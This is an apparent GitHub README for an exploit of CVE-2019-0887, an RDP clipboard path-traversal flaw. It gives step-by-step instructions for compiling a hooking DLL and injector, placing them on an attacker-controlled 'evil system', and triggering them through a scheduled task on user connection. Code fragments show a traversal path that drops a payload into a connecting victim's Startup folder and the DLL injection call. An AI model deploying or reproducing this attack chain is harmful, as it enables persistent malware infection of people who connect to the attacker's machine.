CVE-2019-0887

Compile the CVE-2019-0887, rename to winhlp.dll

Compile the Install_Hook, rename to hook.exe

be careful, they must be compile with x64

Put then into the evil system just like that

c:\windows\hook.exe
c:\windows\winhlp.dll

c:\windows\winhlp64.exe # something evil

if somebody want to change the path, there is the point

# CVE-2019-0887/dllmain.cpp
WCHAR  evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR  efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };

# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");

Maybe use taskschd.msc to create a Task Plan, set a Trigger "On connection to user session" and set the filepath of hook.exe.

Waiting some guys connect to my evil system, copy something, and pwn...

Tips: Why not use DLL hijack?

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
CVE-2019-0887		CVE-2019-0887
Install_Hook/ConsoleApplication		Install_Hook/ConsoleApplication
LICENSE		LICENSE
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2019-0887

About

Releases

Packages

Languages

License

t43Wiu6/CVE-2019-0887

Folders and files

Latest commit

History

Repository files navigation

CVE-2019-0887

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages